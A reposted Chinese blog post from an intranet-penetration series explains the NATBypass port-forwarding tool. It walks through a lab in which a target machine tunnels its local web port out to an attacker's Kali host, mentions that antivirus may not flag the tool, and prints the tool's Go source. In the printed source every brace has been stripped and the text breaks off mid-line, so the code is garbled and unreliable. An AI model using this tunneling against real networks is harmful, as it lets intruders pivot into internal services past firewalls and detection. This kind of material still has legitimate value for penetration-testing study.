内网渗透系列:内网隧道之NATBypass

Posted 思源湖的鱼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了内网渗透系列:内网隧道之NATBypass相关的知识,希望对你有一定的参考价值。

目录

前言

本文研究端口转发的一个工具,NATBypass

github:https://github.com/cw1997/NATBypass

一、概述

1、简介

最后更新于2018年,可认为是lcx在golang下的实现

  • 支持跨平台
  • 支持TCP
  • 优势在于可能不会被查杀

2、原理

服务端监听两个本地端口111、222,客户端建立一个端口转发,比如将本地3389转发到服务端的一个端口111,服务端监听的另一个端口222就相当于客户端的3389,即服务端可以将流量通过端口222传输到客户端

3、用法

nb -listen port1 port2 # 同时监听port1端口和port2端口,当两个客户端主动连接上这两个监听端口之后,nb负责这两个端口间的数据转发。
nb -tran port1 ip:port2 # 本地开始监听port1端口,当port1端口上接收到来自客户端的主动连接之后,nb将主动连接ip:port2,并且负责port1端口和ip:port2之间的数据转发
nb -slave ip1:port1 ip2:port2 # 本地开始主动连接ip1:port1主机和ip2:port2主机,当连接成功之后,nb负责这两个主机之间的数据转发
nb -log filedirpath #日志,不要使用包含空格以及各种特殊字符的文件路径,可使用Linux下的tail -f命令将转发数据实时显示出来

二、实践

1、测试场景

攻击机(服务端):kali 192.168.10.128
目标机(客户端):ubuntu 192.168.10.129

都没有限制TCP连接

2、建立隧道

(1)服务端

监听1111和2222端口

./nb -listen 1111 2222  

(2)客户端

先开启Apache

然后将80端口转发至服务端1111端口

./nb -slave 127.0.0.1:80 192.168.10.128:1111

(3)成功建立


还可以nc、ssh等,根据端口来确定服务

3、抓包看看

三、探索

1、源码与分析

思想非常简单,就是调用net库,然后将对应IP和端口的信息对接

package main

import (
	"fmt"
	"io"
	"log"
	"net"
	"os"
	"regexp"
	"strconv"
	"strings"
	"sync"
	"time"
)

const timeout = 5

func main() 
	//log.SetFlags(log.Ldate | log.Lmicroseconds | log.Lshortfile)
	log.SetFlags(log.Ldate | log.Lmicroseconds)

	printWelcome()

	args := os.Args
	argc := len(os.Args)
	if argc <= 2 
		printHelp()
		os.Exit(0)
	

	//TODO:support UDP protocol

	/*var logFileError error
	if argc > 5 && args[4] == "-log" 
		logPath := args[5] + "/" + time.Now().Format("2006_01_02_15_04_05") // "2006-01-02 15:04:05"
		logPath += args[1] + "-" + strings.Replace(args[2], ":", "_", -1) + "-" + args[3] + ".log"
		logPath = strings.Replace(logPath, `\\`, "/", -1)
		logPath = strings.Replace(logPath, "//", "/", -1)
		logFile, logFileError = os.OpenFile(logPath, os.O_APPEND|os.O_CREATE, 0666)
		if logFileError != nil 
			log.Fatalln("[x]", "log file path error.", logFileError.Error())
		
		log.Println("[√]", "open test log file success. path:", logPath)
	*/

	switch args[1] 
	case "-listen":
		if argc < 3 
			log.Fatalln(`-listen need two arguments, like "nb -listen 1997 2017".`)
		
		port1 := checkPort(args[2])
		port2 := checkPort(args[3])
		log.Println("[√]", "start to listen port:", port1, "and port:", port2)
		port2port(port1, port2)
		break
	case "-tran":
		if argc < 3 
			log.Fatalln(`-tran need two arguments, like "nb -tran 1997 192.168.1.2:3389".`)
		
		port := checkPort(args[2])
		var remoteAddress string
		if checkIp(args[3]) 
			remoteAddress = args[3]
		
		split := strings.SplitN(remoteAddress, ":", 2)
		log.Println("[√]", "start to transmit address:", remoteAddress, "to address:", split[0]+":"+port)
		port2host(port, remoteAddress)
		break
	case "-slave":
		if argc < 3 
			log.Fatalln(`-slave need two arguments, like "nb -slave 127.0.0.1:3389 8.8.8.8:1997".`)
		
		var address1, address2 string
		checkIp(args[2])
		if checkIp(args[2]) 
			address1 = args[2]
		
		checkIp(args[3])
		if checkIp(args[3]) 
			address2 = args[3]
		
		log.Println("[√]", "start to connect address:", address1, "and address:", address2)
		host2host(address1, address2)
		break
	default:
		printHelp()
	


// 作者标签,可删掉
func printWelcome() 
	fmt.Println("+----------------------------------------------------------------+")
	fmt.Println("| Welcome to use NATBypass Ver1.0.0 .                            |")
	fmt.Println("| Code by cw1997 at 2017-10-19 03:59:51                          |")
	fmt.Println("| If you have some problem when you use the tool,                |")
	fmt.Println("| please submit issue at : https://github.com/cw1997/NATBypass . |")
	fmt.Println("+----------------------------------------------------------------+")
	fmt.Println()
	// sleep one second because the fmt is not thread-safety.
	// if not to do this, fmt.Print will print after the log.Print.
	time.Sleep(time.Second)


func printHelp() 
	fmt.Println(`usage: "-listen port1 port2" example: "nb -listen 1997 2017" `)
	fmt.Println(`       "-tran port1 ip:port2" example: "nb -tran 1997 192.168.1.2:3389" `)
	fmt.Println(`       "-slave ip1:port1 ip2:port2" example: "nb -slave 127.0.0.1:3389 8.8.8.8:1997" `)
	fmt.Println(`============================================================`)
	fmt.Println(`optional argument: "-log logpath" . example: "nb -listen 1997 2017 -log d:/nb" `)
	fmt.Println(`log filename format: Y_m_d_H_i_s-agrs1-args2-args3.log`)
	fmt.Println(`============================================================`)
	fmt.Println(`if you want more help, please read "README.md". `)


// 确认IP和端口的输入正确
func checkPort(port string) string 
	PortNum, err := strconv.Atoi(port)
	if err != nil 
		log.Fatalln("[x]", "port should be a number")
	
	if PortNum < 1 || PortNum > 65535 
		log.Fatalln("[x]", "port should be a number and the range is [1,65536)")
	
	return port


func checkIp(address string) bool 
	ipAndPort := strings.Split(address, ":")
	if len(ipAndPort) != 2 
		log.Fatalln("[x]", "address error. should be a string like [ip:port]. ")
	
	ip := ipAndPort[0]
	port := ipAndPort[1]
	checkPort(port)
	pattern := `^(\\d1,2|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d1,2|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d1,2|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d1,2|1\\d\\d|2[0-4]\\d|25[0-5])$`
	ok, err := regexp.MatchString(pattern, ip)
	if err != nil || !ok 
		log.Fatalln("[x]", "ip error. ")
	
	return ok



func port2port(port1 string, port2 string) 
	listen1 := start_server("0.0.0.0:" + port1)
	listen2 := start_server("0.0.0.0:" + port2)
	log.Println("[√]", "listen port:", port1, "and", port2, "success. waiting for client...")
	for 
		conn1 := accept(listen1)
		conn2 := accept(listen2)
		if conn1 == nil || conn2 == nil 
			log.Println("[x]", "accept client faild. retry in ", timeout, " seconds. ")
			time.Sleep(timeout * time.Second)
			continue
		
		forward(conn1, conn2)
	


func port2host(allowPort string, targetAddress string) 
	server := start_server("0.0.0.0:" + allowPort)
	for 
		conn := accept(server)
		if conn == nil 
			continue
		
		//println(targetAddress)
		go func(targetAddress string) 
			log.Println("[+]", "start connect host:["+targetAddress+"]")
			target, err := net.Dial("tcp", targetAddress)
			if err != nil 
				// temporarily unavailable, don't use fatal.
				log.Println("[x]", "connect target address ["+targetAddress+"] faild. retry in ", timeout, "seconds. ")
				conn.Close()
				log.Println("[←]", "close the connect at local:["+conn.LocalAddr().String()+"] and remote:["+conn.RemoteAddr().String()+"]")
				time.Sleep(timeout * time.Second)
				return
			
			log.Println("[→]", "connect target address ["+targetAddress+"] success.")
			forward(target, conn)
		(targetAddress)
	


func host2host(address1, address2 string) 
	for 
		log.Println("[+]", "try to connect host:["+address1+"] and ["+address2+"]")
		var host1, host2 net.Conn
		var err error
		for 
			host1, err = net.Dial("tcp", address1)
			if err == nil 
				log.Println("[→]", "connect ["+address1+"] success.")
				break
			 else 
				log.Println("[x]", "connect target address ["+address1+"] faild. retry in ", timeout, " seconds. ")
				time.Sleep(timeout * time.Second)
			
		
		for 
			host2, err = net.Dial("tcp", address2)
			if err == nil 
				log.Println("[→]", "connect ["+address2+"] success.")
				break
			 else 
				log.Println("[x]", "connect target address ["+address2+"] faild. retry in ", timeout, " seconds. ")
				time.Sleep(timeout * time.Second)
			
		
		forward(host1, host2)
	


func start_server(address string) net.Listener 
	log.Println("[+]", "try to start server on:["+address+"]")
	server, err := net.Listen("tcp", address)
	if err != nil 
		log.Fatalln("[x]", "listen address ["+address+"] faild.")
	
	log.Println("[√]", "start listen at address:["+address+"]")
	return server
	/*defer server.Close()

	for 
		conn, err := server.Accept()
		log.Println("accept a new client. remote address:[" + conn.RemoteAddr().String() +
			"], local address:[" + conn.LocalAddr().String() + "]")
		if err != nil 
			log.Println("accept a new client faild.", err.Error())
			continue
		
		//go recvConnMsg(conn)
	*/


// 传输数据
func accept(listener net.Listener) net.Conn 
	conn, err := listener.Accept()
	if err != nil 
		log.Println("[x]", "accept connect ["+conn.RemoteAddr().String()+"] faild.", err.Error())
		return nil
	
	log.Println("[√]", "accept a new client. remote address:["+conn.RemoteAddr().String()+"], local address:["+conn.LocalAddr().String()+"]")
	return conn


func forward(conn1 net.Conn, conn2 net.Conn) 
	log.Printf("[+] start transmit. [%s],[%s] <-> [%s],[%s] \\n", conn1.LocalAddr().String(), conn1.RemoteAddr().String(), conn2.LocalAddr().String(), conn2.RemoteAddr().String())
	var wg sync.WaitGroup
	// wait tow goroutines
	wg.Add(2)
	go connCopy(conn1, conn2, &wg)
	go connCopy(conn2, conn1, &wg)
	//blocking when the wg is locked
	wg.Wait()


// 记录log
func connCopy(conn1 net.Conn, conn2 net.Conn, wg *sync.WaitGroup) 
	//TODO:log, record the data from conn1 and conn2.
	logFile := openLog(conn1.LocalAddr().String(), conn1.RemoteAddr().String(), conn2.LocalAddr().String(), conn2.RemoteAddr().String())
	if logFile != nil 
		w := io.MultiWriter(conn1, logFile)
		io.Copy(w, conn2)
	 else 
		io.Copy(conn1, conn2)
	
	conn1.Close()
	log.Println("[←]", "close the connect at local:["+conn1.LocalAddr().String()+"] and remote:["+conn1.RemoteAddr().String()+"]")
	//conn2.Close()
	//log.Println("[←]", "close the connect at local:["+conn2.LocalAddr().String()+"] and remote:["+conn2.RemoteAddr().String()+"]")
	wg.Done()

func openLog(address1, address2, address3, address4 string) *os.File 
	args := os.Args
	argc := len(os.Args)
	var logFileError error
	var logFile *os.File
	if argc > 5 && args[4] == "-log" 
		address1 = strings.Replace(address1, ":", "_", -1)
		address2 = strings.Replace(address2, ":", "_", -1)
		address3 = strings.Replace(address3, ":", "_", -1)
		address4 = strings.Replace(address4, ":", "_", -1)
		timeStr := time.Now().Format("2006_01_02_15_04_05") // "2006-01-02 15:04:05"
		logPath := args[5] + "/" + timeStr + args[1] + "-" + address1 + "_" + address2 + "-" + address3 + "_" + address4 + ".log"
		logPath = strings.Replace(logPath, `\\`, "/", -1)
		logPath = strings.Replace(logPath, "//", "/", -1)
		logFile, logFileError = os.OpenFile(logPath, os.O_APPEND|os.O_CREATE, 0666)
		if logFileError != nil 
			log.Fatalln("[x]", "log file path error.", logFileError.Error())
		
		log.Println("[√]", "op

以上是关于内网渗透系列:内网隧道之NATBypass的主要内容,如果未能解决你的问题,请参考以下文章

内网渗透系列:内网隧道之Neo-reGeorg

内网渗透系列:内网隧道之iox

内网渗透系列:内网隧道之pingtunnel

内网渗透系列:内网隧道之spp

内网渗透系列:内网隧道之spp

内网渗透系列:内网隧道之ICMP隧道